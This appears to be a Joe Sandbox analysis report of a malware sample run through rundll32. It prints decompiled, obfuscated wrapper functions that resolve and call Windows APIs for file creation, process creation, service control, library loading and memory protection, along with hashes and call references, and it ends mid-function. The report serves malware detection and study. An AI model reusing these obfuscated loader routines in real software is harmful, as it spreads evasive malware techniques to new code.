                                                                      				_v12 = 0x61c8;
                                                                      				_t72 = 0x48;
                                                                      				_v12 = _v12 / _t72;
                                                                      				_v12 = _v12 + 0xffff34fc;
                                                                      				_v12 = _v12 ^ 0xffff6696;
                                                                      				_v8 = 0xb2ad;
                                                                      				_v8 = _v8 * 0x5f;
                                                                      				_v8 = _v8 * 0xd;
                                                                      				_v8 = _v8 | 0x4443bccc;
                                                                      				_v8 = _v8 ^ 0x475ff878;
                                                                      				E00367378(_t72, 0xa835739b, _t72, 0x90f109b3, 0x146);
                                                                      				_t68 = RtlAllocateHeap(_a8, _a4, _t81); // executed
                                                                      				return _t68;
                                                                      			}
















                                                                      APIs
                                                                      • RtlAllocateHeap.NTDLL(742F2524,FFFF6696,?,?,?,?,?,?,?,?,?,00000000), ref: 00369C38
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000010.00000002.2106858683.0000000000360000.00000040.00020000.sdmp, Offset: 00360000, based on PE: true
                                                                      • Associated: 00000010.00000002.2106874436.0000000000380000.00000040.00020000.sdmp
                                                                      • Associated: 00000010.00000002.2106883889.0000000000382000.00000040.00020000.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_16_2_360000_rundll32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: AllocateHeap
                                                                      • String ID: $%/t
                                                                      • API String ID: 1279760036-1978068534
                                                                      • Opcode ID: e4494530c7293606e0a462107f0355474be5cf6c20967cc5bfbd89f70f117b7f
                                                                      • Instruction ID: 910712628278cacaefc58fd0b6283cab58b4d60a8cb88bb9daaf69b91a38e399
                                                                      • Opcode Fuzzy Hash: e4494530c7293606e0a462107f0355474be5cf6c20967cc5bfbd89f70f117b7f
                                                                      • Instruction Fuzzy Hash: 13214671D00209BFEB18CFA9C9469DEBBB5FB45310F50C099E814AA2A0D7B99B109B51
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 531 37c0c8-37c191 call 372550 call 367378 CreateFileW
                                                                      C-Code - Quality: 53%
                                                                      			E0037C0C8(long __ecx, long __edx, intOrPtr _a4, WCHAR* _a8, intOrPtr _a12, intOrPtr _a16, long _a20, intOrPtr _a24, long _a32, intOrPtr _a36) {
                                                                      				signed int _v8;
                                                                      				signed int _v12;
                                                                      				signed int _v16;
                                                                      				unsigned int _v20;
                                                                      				void* _t40;
                                                                      				void* _t48;
                                                                      				long _t52;
                                                                      				long _t53;
                                                                      
                                                                      				_t52 = __edx;
                                                                      				_push(0);
                                                                      				_push(_a36);
                                                                      				_t53 = __ecx;
                                                                      				_push(_a32);
                                                                      				_push(0);
                                                                      				_push(_a24);
                                                                      				_push(_a20);
                                                                      				_push(_a16);
                                                                      				_push(_a12);
                                                                      				_push(_a8);
                                                                      				_push(_a4);
                                                                      				_push(__edx);
                                                                      				_push(__ecx);
                                                                      				E00372550(_t40);
                                                                      				_v20 = 0xb477;
                                                                      				_v20 = _v20 >> 0x10;
                                                                      				_v20 = _v20 ^ 0x000000e5;
                                                                      				_v16 = 0xb312;
                                                                      				_v16 = _v16 + 0x2a6f;
                                                                      				_v16 = _v16 ^ 0x0000d90b;
                                                                      				_v12 = 0x5a0b;
                                                                      				_v12 = _v12 + 0x400b;
                                                                      				_v12 = _v12 << 0xc;
                                                                      				_v12 = _v12 ^ 0x09a119a3;
                                                                      				_v8 = 0x3388;
                                                                      				_v8 = _v8 + 0x85f8;
                                                                      				_v8 = _v8 * 0x5a;
                                                                      				_v8 = _v8 ^ 0x00415e39;
                                                                      				E00367378(__ecx, 0x81a8678d, __ecx, 0x90f109b3, 0x2bf);
                                                                      				_t48 = CreateFileW(_a8, _t52, _t53, 0, _a32, _a20, 0); // executed
                                                                      				return _t48;
                                                                      			}












                                                                      APIs
                                                                      • CreateFileW.KERNEL32(0000D90B,?,D583BA2A,00000000,?,0ACC4A3C,00000000), ref: 0037C189
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000010.00000002.2106858683.0000000000360000.00000040.00020000.sdmp, Offset: 00360000, based on PE: true
                                                                      • Associated: 00000010.00000002.2106874436.0000000000380000.00000040.00020000.sdmp
                                                                      • Associated: 00000010.00000002.2106883889.0000000000382000.00000040.00020000.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_16_2_360000_rundll32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: CreateFile
                                                                      • String ID: 9^A
                                                                      • API String ID: 823142352-4044883665
                                                                      • Opcode ID: 6b5ee137b9331e853cde0f1d047c810309658232d35a9beccd783d46722f351c
                                                                      • Instruction ID: 3ddbc7ab29c7f91cdabad37061dbc3fabc1dd7ba5f204c4cc84daee86c8cadd2
                                                                      • Opcode Fuzzy Hash: 6b5ee137b9331e853cde0f1d047c810309658232d35a9beccd783d46722f351c
                                                                      • Instruction Fuzzy Hash: 9521EFB290020CBFEF019F95DD498DEBBB9EB45358F108198FA2466250D7B69E249B90
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 536 3c1638-3c1641 537 3c164b-3c16d1 DdeInitializeA call 3c1328 call 3c1a14 536->537 538 3c1643 536->538 548 3c16d6-3c16eb 537->548 538->537
                                                                      APIs
                                                                      • DdeInitializeA.USER32(00000044,Function_0003E428,00000000,00000000), ref: 003C1686
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000010.00000002.2106889647.0000000000383000.00000020.00020000.sdmp, Offset: 00383000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_16_2_383000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: Initialize
                                                                      • String ID: Link
                                                                      • API String ID: 2538663250-2526951119
                                                                      • Opcode ID: 300092c084eb4d181be9f1bb182563589a76f74aca148936dc60044346acd701
                                                                      • Instruction ID: de63df5982318b0b0688ef1e5774df79959982ca5185062a24fe354e95512c33
                                                                      • Opcode Fuzzy Hash: 300092c084eb4d181be9f1bb182563589a76f74aca148936dc60044346acd701
                                                                      • Instruction Fuzzy Hash: A0118C74600740AFD722EB74CD82B4E77E8AF06740B919838F804DBB56EA76AE009755
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 550 49eb40-49eb93 VirtualProtect 551 49eb95-49eba1 550->551 552 49eba6-49ec17 550->552 553 49ec3a-49ec85 call 49e7a0 call 49e7e0 551->553 552->553 569 49ec19-49ec37 552->569 560 49ec90-49ec9a 553->560 562 49ecf8-49ed4a call 49e920 560->562 563 49ec9c-49eca3 560->563 572 49ed78-49ed7f 562->572 573 49ed4c-49ed50 562->573 565 49eced-49ecf6 563->565 566 49eca5-49ecac 563->566 565->560 566->565 571 49ecae-49ecea call 49e7e0 566->571 569->553 571->565 577 49ed8a-49ed94 572->577 573->572 576 49ed52-49ed75 call 49e880 573->576 576->572 580 49ede6-49ee1b call 49f000 577->580 581 49ed96-49ed9d 577->581 584 49eddb-49ede4 581->584 585 49ed9f-49eda6 581->585 584->577 585->584 588 49eda8-49edd9 call 49ee20 VirtualProtect 585->588 588->584
                                                                      APIs
                                                                      • VirtualProtect.KERNELBASE(?,?,00000040,?), ref: 0049EB8F
                                                                      • VirtualProtect.KERNELBASE(?,?,00000000), ref: 0049EDD9
                                                                      Memory Dump Source
                                                                      • Source File: 00000010.00000002.2107113862.0000000000480000.00000040.00000001.sdmp, Offset: 00480000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_16_2_480000_rundll32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: ProtectVirtual
                                                                      • String ID:
                                                                      • API String ID: 544645111-0
                                                                      • Opcode ID: ad1daf5a7c910bd02d1d72619915e1fdd92f553c09c4da0439c37bff57805f65
                                                                      • Instruction ID: dadbc3be37d55ae011d11176274fd3627269d11785798018edc636a7e17013b5
                                                                      • Opcode Fuzzy Hash: ad1daf5a7c910bd02d1d72619915e1fdd92f553c09c4da0439c37bff57805f65
                                                                      • Instruction Fuzzy Hash: 12C1B9B5A00209DFCB48CF89C590EAEB7B6BF88304F148159E919AB355D735EE42CF94
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                        • Part of subcall function 003C1AC8: DdeFreeStringHandle.USER32(?,?), ref: 003C1AE8
                                                                      • DdeCreateStringHandleA.USER32(?,00000000), ref: 003C1A82
                                                                      • DdeNameService.USER32(?,00000000,00000000,00000001), ref: 003C1A95
                                                                      Memory Dump Source
                                                                      • Source File: 00000010.00000002.2106889647.0000000000383000.00000020.00020000.sdmp, Offset: 00383000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_16_2_383000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: HandleString$CreateFreeNameService
                                                                      • String ID:
                                                                      • API String ID: 374373348-0
                                                                      • Opcode ID: 3f24b2819c163fdcf0d451e0feb5b34f865434fdcd21294656277ac4aae635b1
                                                                      • Instruction ID: 8a95dceeb941b887d1cc5923c37858816e78adb3c69bf121f04662eef27cb9c9
                                                                      • Opcode Fuzzy Hash: 3f24b2819c163fdcf0d451e0feb5b34f865434fdcd21294656277ac4aae635b1
                                                                      • Instruction Fuzzy Hash: 36115235B212549FDB17EBA4C892F4A37ACAF4AB00B514564FD00DF24BDA71ED009794
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 80%
                                                                      			E00367F4B(WCHAR* __ecx, void* __edx, WCHAR* _a4, intOrPtr _a8, intOrPtr _a12) {
                                                                      				signed int _v8;
                                                                      				unsigned int _v12;
                                                                      				signed int _v16;
                                                                      				signed int _v20;
                                                                      				signed int _v24;
                                                                      				intOrPtr _v28;
                                                                      				intOrPtr _v32;
                                                                      				void* _t35;
                                                                      				int _t43;
                                                                      				WCHAR* _t46;
                                                                      
                                                                      				_push(_a12);
                                                                      				_t46 = __ecx;
                                                                      				_push(_a8);
                                                                      				_push(_a4);
                                                                      				_push(__ecx);
                                                                      				E00372550(_t35);
                                                                      				_v24 = _v24 & 0x00000000;
                                                                      				_v32 = 0x71485a;
                                                                      				_v28 = 0x57c810;
                                                                      				_v20 = 0x2813;
                                                                      				_v20 = _v20 * 0x59;
                                                                      				_v20 = _v20 ^ 0x000dd428;
                                                                      				_v16 = 0xdb84;
                                                                      				_v16 = _v16 | 0xe2c96d38;
                                                                      				_v16 = _v16 ^ 0xe2c994d7;
                                                                      				_v12 = 0xc19e;
                                                                      				_v12 = _v12 >> 7;
                                                                      				_v12 = _v12 ^ 0x000060ae;
                                                                      				_v8 = 0x265e;
                                                                      				_v8 = _v8 + 0x315a;
                                                                      				_v8 = _v8 << 0xb;
                                                                      				_v8 = _v8 ^ 0x02bd94c0;
                                                                      				E00367378(__ecx, 0x8a39c19d, __ecx, 0x90f109b3, 0x96);
                                                                      				_t43 = lstrcmpiW(_t46, _a4); // executed
                                                                      				return _t43;
                                                                      			}














                                                                      APIs
                                                                      • lstrcmpiW.KERNELBASE(?,000060AE,?,?,?,?,?,?,?,?,?,00000000), ref: 00367FF7
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000010.00000002.2106858683.0000000000360000.00000040.00020000.sdmp, Offset: 00360000, based on PE: true
                                                                      • Associated: 00000010.00000002.2106874436.0000000000380000.00000040.00020000.sdmp
                                                                      • Associated: 00000010.00000002.2106883889.0000000000382000.00000040.00020000.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_16_2_360000_rundll32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: lstrcmpi
                                                                      • String ID: ZHq
                                                                      • API String ID: 1586166983-2177431251
                                                                      • Opcode ID: 1dbb23c816d530a556f00a9c331316415ddf5d0f243181d7c072a17d6123fc67
                                                                      • Instruction ID: c60deab9ba6b936709c0d8a632fbcf04c802e8dcff9eeef48af14848a776191a
                                                                      • Opcode Fuzzy Hash: 1dbb23c816d530a556f00a9c331316415ddf5d0f243181d7c072a17d6123fc67
                                                                      • Instruction Fuzzy Hash: A311DFB6C01219ABDF11DFA4C94A8DEBFB4EF04318F108588E92466251D3B95B15DFA1
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • VirtualAlloc.KERNELBASE(00000000,?,00003000,00000040), ref: 0049E6A4
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000010.00000002.2107113862.0000000000480000.00000040.00000001.sdmp, Offset: 00480000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_16_2_480000_rundll32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: AllocVirtual
                                                                      • String ID: VirtualAlloc
                                                                      • API String ID: 4275171209-164498762
                                                                      • Opcode ID: a77aec488e472259a9f8f903e2d2770156d735046b38bce3c934600cf440992a
                                                                      • Instruction ID: 3b76c5742da86df5fe75b5bfdd76e8ca751b2cf8203c4e97b7c5f32c0e539b75
                                                                      • Opcode Fuzzy Hash: a77aec488e472259a9f8f903e2d2770156d735046b38bce3c934600cf440992a
                                                                      • Instruction Fuzzy Hash: EF113060D08289EAEF01D7E99409BFFBFB55B11708F044098D5446B282D2BE57588BA6
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 40%
                                                                      			E0037B86E(int __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, WCHAR* _a24, struct _PROCESS_INFORMATION* _a40, intOrPtr _a44, intOrPtr _a48, WCHAR* _a52, intOrPtr _a56, struct _STARTUPINFOW* _a60, intOrPtr _a68) {
                                                                      				signed int _v8;
                                                                      				unsigned int _v12;
                                                                      				signed int _v16;
                                                                      				signed int _v20;
                                                                      				void* _t49;
                                                                      				int _t58;
                                                                      				signed int _t60;
                                                                      				int _t65;
                                                                      
                                                                      				_push(_a68);
                                                                      				_t65 = __ecx;
                                                                      				_push(0);
                                                                      				_push(_a60);
                                                                      				_push(_a56);
                                                                      				_push(_a52);
                                                                      				_push(_a48);
                                                                      				_push(_a44);
                                                                      				_push(_a40);
                                                                      				_push(0);
                                                                      				_push(0);
                                                                      				_push(0);
                                                                      				_push(_a24);
                                                                      				_push(0);
                                                                      				_push(_a16);
                                                                      				_push(_a12);
                                                                      				_push(_a8);
                                                                      				_push(_a4);
                                                                      				_push(__ecx);
                                                                      				E00372550(_t49);
                                                                      				_v12 = 0xd1fa;
                                                                      				_t60 = 0x3c;
                                                                      				_v12 = _v12 / _t60;
                                                                      				_v12 = _v12 >> 0xa;
                                                                      				_v12 = _v12 ^ 0x00001682;
                                                                      				_v20 = 0xd4c2;
                                                                      				_v20 = _v20 + 0x3986;
                                                                      				_v20 = _v20 ^ 0x00013905;
                                                                      				_v8 = 0x8c53;
                                                                      				_v8 = _v8 >> 4;
                                                                      				_v8 = _v8 << 1;
                                                                      				_v8 = _v8 ^ 0x000060d6;
                                                                      				_v16 = 0x467b;
                                                                      				_v16 = _v16 + 0xffff2b71;
                                                                      				_v16 = _v16 ^ 0xffff105c;
                                                                      				E00367378(_t60, 0x8aa9db76, _t60, 0x90f109b3, 0x100);
                                                                      				_t58 = CreateProcessW(_a52, _a24, 0, 0, _t65, 0, 0, 0, _a60, _a40); // executed
                                                                      				return _t58;
                                                                      			}












                                                                      APIs
                                                                      • CreateProcessW.KERNEL32(?,?,00000000,00000000,?,00000000,00000000,00000000,?,?), ref: 0037B942
                                                                      Memory Dump Source
                                                                      • Source File: 00000010.00000002.2106858683.0000000000360000.00000040.00020000.sdmp, Offset: 00360000, based on PE: true
                                                                      • Associated: 00000010.00000002.2106874436.0000000000380000.00000040.00020000.sdmp
                                                                      • Associated: 00000010.00000002.2106883889.0000000000382000.00000040.00020000.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_16_2_360000_rundll32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: CreateProcess
                                                                      • String ID:
                                                                      • API String ID: 963392458-0
                                                                      • Opcode ID: 0c2a7e7f22d8817370b5b33d85e2b014bcdf9d8a6a03b3886b5f04f00f255257
                                                                      • Instruction ID: 78a995dbe56533c8809a1bfef6e7f75c8e405879f3fbaa74f30c911653d5413b
                                                                      • Opcode Fuzzy Hash: 0c2a7e7f22d8817370b5b33d85e2b014bcdf9d8a6a03b3886b5f04f00f255257
                                                                      • Instruction Fuzzy Hash: 7221C472800248BBDF169F95CD09CDFBFB9FF89714F408158FA1466260D7B69A60DBA0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 58%
                                                                      			E0036471A(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28) {
                                                                      				signed int _v8;
                                                                      				signed int _v12;
                                                                      				signed int _v16;
                                                                      				signed int _v20;
                                                                      				void* _t50;
                                                                      				intOrPtr* _t61;
                                                                      				void* _t62;
                                                                      				signed int _t63;
                                                                      				signed int _t64;
                                                                      
                                                                      				E00372550(_t50);
                                                                      				_v20 = 0xf336;
                                                                      				_v20 = _v20 + 0x29f7;
                                                                      				_v20 = _v20 ^ 0x000152a0;
                                                                      				_v8 = 0xc9c4;
                                                                      				_v8 = _v8 >> 0x10;
                                                                      				_v8 = _v8 << 3;
                                                                      				_t63 = 0x6d;
                                                                      				_v8 = _v8 * 0x43;
                                                                      				_v8 = _v8 ^ 0x0000467c;
                                                                      				_v16 = 0x763b;
                                                                      				_t64 = 0x2d;
                                                                      				_v16 = _v16 / _t63;
                                                                      				_v16 = _v16 << 4;
                                                                      				_v16 = _v16 ^ 0x000058e5;
                                                                      				_v12 = 0x527e;
                                                                      				_v12 = _v12 / _t64;
                                                                      				_v12 = _v12 | 0xd776a7a3;
                                                                      				_v12 = _v12 ^ 0xd776f938;
                                                                      				_t61 = E00367378(_t64, 0x23d331d1, _t64, 0xd20b8aa4, 0x174);
                                                                      				_t62 =  *_t61(0, _a4, 0, 0, _a8, 0, 0, _a4, _a8, _a12, _a16, _a20, _a24, _a28, 0); // executed
                                                                      				return _t62;
                                                                      			}












                                                                      APIs
                                                                      • SHGetFolderPathW.SHELL32(00000000,D776F938,00000000,00000000,000058E5), ref: 003647E4
                                                                      Memory Dump Source
                                                                      • Source File: 00000010.00000002.2106858683.0000000000360000.00000040.00020000.sdmp, Offset: 00360000, based on PE: true
                                                                      • Associated: 00000010.00000002.2106874436.0000000000380000.00000040.00020000.sdmp
                                                                      • Associated: 00000010.00000002.2106883889.0000000000382000.00000040.00020000.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_16_2_360000_rundll32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: FolderPath
                                                                      • String ID:
                                                                      • API String ID: 1514166925-0
                                                                      • Opcode ID: 0a1e481ed0b4bb684b4a4fbdce82325e9ffb300045724f91d1da592bf306b1e2
                                                                      • Instruction ID: d2848275828aecea075f618de822f80a2cecc93ca98c4ed74b6e2e9e8efae337
                                                                      • Opcode Fuzzy Hash: 0a1e481ed0b4bb684b4a4fbdce82325e9ffb300045724f91d1da592bf306b1e2
                                                                      • Instruction Fuzzy Hash: 12210372D01208FBEF15DFE5C84A8DEBBB5EF05354F108089E924AA250D3B59B10DF90
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 86%
                                                                      			E0037340E(void* __ecx, void* __edx, int _a12) {
                                                                      				signed int _v8;
                                                                      				signed int _v12;
                                                                      				signed int _v16;
                                                                      				signed int _v20;
                                                                      				short* _v24;
                                                                      				intOrPtr _v28;
                                                                      				void* _t45;
                                                                      				void* _t57;
                                                                      				signed int _t59;
                                                                      				signed int _t60;
                                                                      
                                                                      				_push(_a12);
                                                                      				_push(0);
                                                                      				_push(0);
                                                                      				E00372550(_t45);
                                                                      				_v28 = 0x755cc3;
                                                                      				_v24 = 0;
                                                                      				_v20 = 0xc93f;
                                                                      				_v20 = _v20 >> 3;
                                                                      				_t59 = 0x1a;
                                                                      				_v20 = _v20 / _t59;
                                                                      				_v20 = _v20 ^ 0x00003660;
                                                                      				_v16 = 0x16ad;
                                                                      				_v16 = _v16 + 0x57a7;
                                                                      				_v16 = _v16 | 0xbe0b763b;
                                                                      				_v16 = _v16 ^ 0xbe0b2e9f;
                                                                      				_v12 = 0xa207;
                                                                      				_v12 = _v12 + 0xb6;
                                                                      				_t60 = 0x37;
                                                                      				_v12 = _v12 * 0x38;
                                                                      				_v12 = _v12 ^ 0x0023dbd3;
                                                                      				_v8 = 0xebb1;
                                                                      				_v8 = _v8 / _t60;
                                                                      				_v8 = _v8 | 0x19ad118e;
                                                                      				_v8 = _v8 ^ 0x19ad0924;
                                                                      				E00367378(_t60, 0x3e7f6fd6, _t60, 0x2daf77dd, 0x231);
                                                                      				_t57 = OpenSCManagerW(0, 0, _a12); // executed
                                                                      				return _t57;
                                                                      			}













                                                                      APIs
                                                                      • OpenSCManagerW.SECHOST(00000000,00000000,00003660,?,?,?,?,?,?,?,?,?,B0D9BF73), ref: 003734D3
                                                                      Memory Dump Source
                                                                      • Source File: 00000010.00000002.2106858683.0000000000360000.00000040.00020000.sdmp, Offset: 00360000, based on PE: true
                                                                      • Associated: 00000010.00000002.2106874436.0000000000380000.00000040.00020000.sdmp
                                                                      • Associated: 00000010.00000002.2106883889.0000000000382000.00000040.00020000.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_16_2_360000_rundll32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: ManagerOpen
                                                                      • String ID:
                                                                      • API String ID: 1889721586-0
                                                                      • Opcode ID: c0ae0e58ecd35d2b9c62b79812254f01c588eabc6ff7d27383c4dcafa84254bd
                                                                      • Instruction ID: 322d6a02dbca8214b853831efc1d62d28e11b160857af95149bfccbca261bc95
                                                                      • Opcode Fuzzy Hash: c0ae0e58ecd35d2b9c62b79812254f01c588eabc6ff7d27383c4dcafa84254bd
                                                                      • Instruction Fuzzy Hash: 8C21E3B1D0131DABDB18DFA9C84A8EFBBB5FB15714F10819AE414AA240D3B55B148F91
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 79%
                                                                      			E00370321(void* __ecx, int __edx, intOrPtr _a4, intOrPtr _a8, short* _a12) {
                                                                      				unsigned int _v8;
                                                                      				signed int _v12;
                                                                      				signed int _v16;
                                                                      				signed int _v20;
                                                                      				signed int _v24;
                                                                      				intOrPtr _v28;
                                                                      				void* _t44;
                                                                      				void* _t56;
                                                                      				void* _t59;
                                                                      				int _t60;
                                                                      
                                                                      				_push(_a12);
                                                                      				_t60 = __edx;
                                                                      				_t59 = __ecx;
                                                                      				_push(_a8);
                                                                      				_push(_a4);
                                                                      				_push(__edx);
                                                                      				_push(__ecx);
                                                                      				E00372550(_t44);
                                                                      				_v24 = _v24 & 0x00000000;
                                                                      				_v28 = 0xc39a9;
                                                                      				_v20 = 0xd5ea;
                                                                      				_v20 = _v20 | 0xff6e49b2;
                                                                      				_v20 = _v20 << 1;
                                                                      				_v20 = _v20 ^ 0xfeddf181;
                                                                      				_v12 = 0x5ebb;
                                                                      				_v12 = _v12 * 0x36;
                                                                      				_v12 = _v12 * 0x4e;
                                                                      				_v12 = _v12 | 0x0415626f;
                                                                      				_v12 = _v12 ^ 0x0617d8e0;
                                                                      				_v16 = 0xb467;
                                                                      				_v16 = _v16 << 4;
                                                                      				_v16 = _v16 * 0x58;
                                                                      				_v16 = _v16 ^ 0x03e03a17;
                                                                      				_v8 = 0xc80e;
                                                                      				_v8 = _v8 * 5;
                                                                      				_v8 = _v8 * 0x5d;
                                                                      				_v8 = _v8 >> 5;
                                                                      				_v8 = _v8 ^ 0x000b2851;
                                                                      				E00367378(__ecx, 0x612723fe, __ecx, 0x2daf77dd, 0x10e);
                                                                      				_t56 = OpenServiceW(_t59, _a12, _t60); // executed
                                                                      				return _t56;
                                                                      			}













                                                                      APIs
                                                                      • OpenServiceW.SECHOST(?,FEDDF181,B0D9BF73,?,?,?,?,?,?,?,?,00000000,B0D9BF73), ref: 003703E9
                                                                      Memory Dump Source
                                                                      • Source File: 00000010.00000002.2106858683.0000000000360000.00000040.00020000.sdmp, Offset: 00360000, based on PE: true
                                                                      • Associated: 00000010.00000002.2106874436.0000000000380000.00000040.00020000.sdmp
                                                                      • Associated: 00000010.00000002.2106883889.0000000000382000.00000040.00020000.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_16_2_360000_rundll32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: OpenService
                                                                      • String ID:
                                                                      • API String ID: 3098006287-0
                                                                      • Opcode ID: 0746f5dc7b9730f7e3e73603d11b48040c955b65539017cf6c6302df4382ab22
                                                                      • Instruction ID: 86abe385576182b3b15961d23b330b3de7c66657602c2e8231cf77faffa024f3
                                                                      • Opcode Fuzzy Hash: 0746f5dc7b9730f7e3e73603d11b48040c955b65539017cf6c6302df4382ab22
                                                                      • Instruction Fuzzy Hash: 4721FFB1C01209BBCB15DFA5C98A8DEBFB4EB45304F108099E824B6251D3B49B44DF90
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 95%
                                                                      			E003749CF(void* __ecx, void* __edx, WCHAR* _a4) {
                                                                      				signed int _v8;
                                                                      				signed int _v12;
                                                                      				signed int _v16;
                                                                      				signed int _v20;
                                                                      				signed int _v24;
                                                                      				intOrPtr _v28;
                                                                      				void* _t52;
                                                                      				struct HINSTANCE__* _t65;
                                                                      				signed int _t67;
                                                                      				signed int _t68;
                                                                      				signed int _t69;
                                                                      
                                                                      				_push(_a4);
                                                                      				E00372550(_t52);
                                                                      				_v24 = _v24 & 0x00000000;
                                                                      				_v28 = 0x2e62bd;
                                                                      				_v12 = 0x9175;
                                                                      				_v12 = _v12 >> 3;
                                                                      				_v12 = _v12 >> 4;
                                                                      				_t67 = 0x72;
                                                                      				_v12 = _v12 / _t67;
                                                                      				_v12 = _v12 ^ 0x00007d95;
                                                                      				_v20 = 0x6b8f;
                                                                      				_v20 = _v20 + 0xab5d;
                                                                      				_v20 = _v20 ^ 0x000118a2;
                                                                      				_v16 = 0x74fd;
                                                                      				_v16 = _v16 + 0xb2f4;
                                                                      				_v16 = _v16 | 0x45835894;
                                                                      				_v16 = _v16 ^ 0x45831718;
                                                                      				_v8 = 0x475a;
                                                                      				_t68 = 0x1a;
                                                                      				_v8 = _v8 / _t68;
                                                                      				_t69 = 0x71;
                                                                      				_v8 = _v8 / _t69;
                                                                      				_v8 = _v8 | 0x9a1a6af5;
                                                                      				_v8 = _v8 ^ 0x9a1a601d;
                                                                      				E00367378(_t69, 0xd3779e90, _t69, 0x90f109b3, 0xd8);
                                                                      				_t65 = LoadLibraryW(_a4); // executed
                                                                      				return _t65;
                                                                      			}















                                                                      APIs
                                                                      • LoadLibraryW.KERNEL32(00007D95), ref: 00374A98
                                                                      Memory Dump Source
                                                                      • Source File: 00000010.00000002.2106858683.0000000000360000.00000040.00020000.sdmp, Offset: 00360000, based on PE: true
                                                                      • Associated: 00000010.00000002.2106874436.0000000000380000.00000040.00020000.sdmp
                                                                      • Associated: 00000010.00000002.2106883889.0000000000382000.00000040.00020000.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_16_2_360000_rundll32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: LibraryLoad
                                                                      • String ID:
                                                                      • API String ID: 1029625771-0
                                                                      • Opcode ID: c29722005f0625fdf4ec6d3b097d6093e6e9b8b9e5bc80068fdeaf8eb8cc74df
                                                                      • Instruction ID: fa4b12668ec6d21353080ad86ccdc36e6c74fcaf49b463c0be74cae6c4805b30
                                                                      • Opcode Fuzzy Hash: c29722005f0625fdf4ec6d3b097d6093e6e9b8b9e5bc80068fdeaf8eb8cc74df
                                                                      • Instruction Fuzzy Hash: 482118B5E00208FBDB04CFA5C94A5EEBBB1EB41304F10C099E518AB291D7B96B549B50
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 58%
                                                                      			E003741CA(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a20) {
                                                                      				signed int _v8;
                                                                      				signed int _v12;
                                                                      				signed int _v16;
                                                                      				signed int _v20;
                                                                      				void* _t42;
                                                                      				intOrPtr* _t50;
                                                                      				void* _t51;
                                                                      				signed int _t53;
                                                                      				void* _t57;
                                                                      
                                                                      				_t57 = __ecx;
                                                                      				E00372550(_t42);
                                                                      				_v20 = 0x33dd;
                                                                      				_t53 = 0x60;
                                                                      				_v20 = _v20 / _t53;
                                                                      				_v20 = _v20 ^ 0x0000445b;
                                                                      				_v8 = 0x98b2;
                                                                      				_v8 = _v8 << 0xa;
                                                                      				_v8 = _v8 | 0x9f0dae98;
                                                                      				_v8 = _v8 + 0xffff2dd8;
                                                                      				_v8 = _v8 ^ 0x9f6f2800;
                                                                      				_v16 = 0x7a4d;
                                                                      				_v16 = _v16 << 5;
                                                                      				_v16 = _v16 ^ 0x630ec107;
                                                                      				_v16 = _v16 ^ 0x6301fd0c;
                                                                      				_v12 = 0xd3a1;
                                                                      				_v12 = _v12 ^ 0x9b5a4994;
